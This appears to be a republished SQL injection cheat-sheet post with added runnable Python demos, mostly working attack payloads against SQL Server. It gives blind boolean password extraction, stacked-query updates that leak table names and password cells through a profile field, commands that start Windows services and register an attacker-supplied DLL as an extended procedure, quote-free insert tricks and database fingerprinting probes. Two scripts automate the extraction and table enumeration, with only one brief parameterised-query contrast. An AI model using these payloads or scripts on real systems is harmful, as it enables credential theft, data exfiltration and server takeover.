SQL Injection Summary (4)

Technology  2022-05-11  114

Traditional query construction:

select * FROM news where id=... AND topic=... AND .....

Into a query of this shape the attacker supplies a value that closes the quoted string, appends a subquery against the user table, and re-opens the string so that the application's own closing quote still balances. The payload below asks whether the first character of user victim's password is '1' (right(left(userpass,1),1) takes the first character). The page renders normally when the count is 1 and differently when it is 0, so the password can be recovered one character at a time without any output from the subquery itself:

admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,1),1)='1') and userpass<>'

Two further stacked-query payloads are listed alongside it; they only work when the back end accepts a batch after the injected semicolon, which SQL Server does:

select 123;--
use master;--
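The character-by-character loop that the payload above implies, as an added, runnable simulation that is not code from the original post. It uses an in-memory SQLite database (the table [user], the users admin and victim and their passwords are constructed for the demo), builds the same payload shape as the page's, and drives the boolean oracle over every position and candidate character. SQLite has no right()/left(), so substr() stands in for right(left(userpass, pos), 1); everything else follows the page. A parameterised version of the lookup is included to show why the payload stops working once the input is bound instead of concatenated:

```python
import sqlite3
import string

# Constructed sample data for this demo (not from the page): a user table whose
# password column the attacker cannot see directly.
SCHEMA = """
CREATE TABLE [user](id INTEGER PRIMARY KEY, username TEXT, userpass TEXT);
INSERT INTO [user] VALUES (1, 'admin', 'S3cret!');
INSERT INTO [user] VALUES (2, 'victim', '1q2w');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(con, username):
    """The injection point: the page builds its WHERE clause by concatenation."""
    sql = "SELECT id FROM [user] WHERE username='" + username + "'"
    return con.execute(sql).fetchall()


def oracle(con, pos, ch):
    """True iff character `pos` (1-based) of victim's password is `ch`.

    Same shape as the page's payload: close the quote, add a subquery whose
    count is 1 or 0, re-open the quote so the app's closing quote balances.
    substr() stands in for MSSQL's right(left(userpass, pos), 1).
    """
    escaped = ch.replace("'", "''")
    payload = (
        "admin' and 1=(select count(*) from [user] where username='victim' "
        f"and substr(userpass,{pos},1)='{escaped}') and userpass<>'"
    )
    return len(vulnerable_lookup(con, payload)) > 0


def extract_password(con, alphabet=string.printable.strip(), max_len=32):
    """Walk positions 1..max_len; stop at the first position no character matches."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if oracle(con, pos, ch):
                recovered += ch
                break
        else:
            break  # substr() past the end returns '' -> nothing matches -> done
    return recovered


def safe_lookup(con, username):
    """Hardened form: bound parameter, so the payload is just an odd username."""
    return con.execute("SELECT id FROM [user] WHERE username=?", (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("recovered:", extract_password(db))
    print("safe lookup with payload:", safe_lookup(db, "admin' and 1=1 and userpass<>'"))
```

Two practical caveats: the loop costs one request per candidate character per position, and comparing with ascii() and a binary search over the code range brings that down to about seven requests per character; and on SQL Server the default collation is case-insensitive, so a plain = comparison cannot tell 'a' from 'A' and the check has to go through ascii() or a binary collation.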

a' or name like 'fff%';--

This shows that there is a user called ffff.

' and 1<>(select count(email) from [user]);--

This confirms that the user table has an email column (the query errors if it does not); that column is the readback channel used below.

update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--

Explanation: the statement above fetches the first user table in the database (xtype='u' selects user tables in sysobjects) and writes its name into user ffff's email field. Viewing ffff's profile then shows that the first user table is called ad. (The page spells the table [user] in some payloads and [users] in others; it is the same table.) Next, the name ad is used to fetch that table's ID:

ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--

With the ID in hand (581577110 in this example), the second table's name is obtained the same way, by asking for the first user table with a larger ID:

ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--

Note that top 1 without an order by does not guarantee which row comes back; add order by id to make the walk deterministic. Once a table of interest (here password) has been found, the same channel reads its row count and individual cells:

ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--

The remaining payloads in this group are not about data extraction but about the server itself, and they need the application's login to be a sysadmin. xp_servicecontrol starts a Windows service from inside SQL Server (here the Task Scheduler and Server services), and sp_addextendedproc registers a DLL that the attacker has already placed on the server as a new extended stored procedure:

exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll'
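The catalogue walk and cell readback described in the steps above, as an added, runnable simulation that is not code from the original post. It uses an in-memory SQLite database (the tables users, ad and password and their rows are constructed for the demo); the vulnerable lookup runs its input as a batch, as SQL Server does for the page's ';update ...;--' payloads, and the profile page is the readback channel. The page keys its walk on sysobjects.id (id > last_id); sqlite_master has no such id column, so this walk keys on the ordered name column instead, which is the same technique with a different cursor:

```python
import sqlite3

# Constructed sample schema for this demo (not from the page): the app's users
# table plus two other tables whose names and contents the attacker wants.
SCHEMA = """
CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, email TEXT);
CREATE TABLE ad(id INTEGER PRIMARY KEY, body TEXT);
CREATE TABLE password(id INTEGER PRIMARY KEY, name TEXT, pwd TEXT);
INSERT INTO users VALUES (1, 'ffff', 'ffff@example.invalid');
INSERT INTO password VALUES (1, 'alice', 'wonderland');
INSERT INTO password VALUES (2, 'bob', 'hunter2');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(con, name):
    """The injection point: `name` is concatenated and the driver runs a whole
    batch, as SQL Server does for the page's ';update ...;--' payloads."""
    con.executescript("SELECT id FROM users WHERE name='" + name + "'")


def profile_email(con, name):
    """The readback channel: the page that shows a user's own profile."""
    row = con.execute("SELECT email FROM users WHERE name=?", (name,)).fetchone()
    return row[0] if row else None


def read_value(con, subquery):
    """Store the result of an attacker-chosen scalar subquery in ffff's email,
    then read it back through the profile page (one request pair per value)."""
    payload = "ffff';update users set email=(" + subquery + ") where name='ffff';--"
    vulnerable_lookup(con, payload)
    return profile_email(con, "ffff")


def enumerate_tables(con):
    """Walk the catalogue one table per request pair. The page keys the walk on
    sysobjects.id (id > last_id); sqlite_master has no such id, so this walk
    keys on name (name > last_name). Either way the cursor must be ordered."""
    names, last = [], ""
    while True:
        last_sql = last.replace("'", "''")
        name = read_value(
            con,
            "select name from sqlite_master where type='table' "
            f"and name>'{last_sql}' order by name limit 1",
        )
        if name is None:  # subquery returned NULL: no more tables
            return names
        names.append(name)
        last = name


if __name__ == "__main__":
    db = make_db()
    print("tables:", enumerate_tables(db))
    print("rows in password:", read_value(db, "select count(id) from password"))
    print("pwd of id 2:", read_value(db, "select pwd from password where id=2"))
```

The NULL check is what terminates the walk: when no row satisfies the cursor condition the scalar subquery yields NULL, the email field becomes empty, and the profile page shows nothing. The same read_value() helper serves for the row count and the cell reads on the page, since every one of them is just a different scalar subquery written into the same column.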

The extended stored procedure can then be called in the usual way:

exec xp_webserver

Once the extended procedure has been run, it can be removed like this:

sp_dropextendedproc 'xp_webserver'

The next group shows ways of inserting a row into the users table without a usable quote character, or with one that the application escapes. The char() calls spell the string chris byte by byte, so no quote is needed at all; the second form uses bare numbers; the third shows a doubled quote ('admin''--') surviving into the stored value:

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, 'admin''--', 'password', 0xffff)--

Finally, three probes that fingerprint the back end:

;and user>0;
;and (select count(*) from sysobjects)>0;
;and (select count(*) from mysysobjects)>0   // Access database

On SQL Server, user>0 forces the current user name (an nvarchar) to be converted to int and fails with an error message that contains the name; sysobjects exists on SQL Server, while the Access system table is MSysObjects (the page writes it as mysysobjects), so whichever of the last two probes succeeds identifies the database.


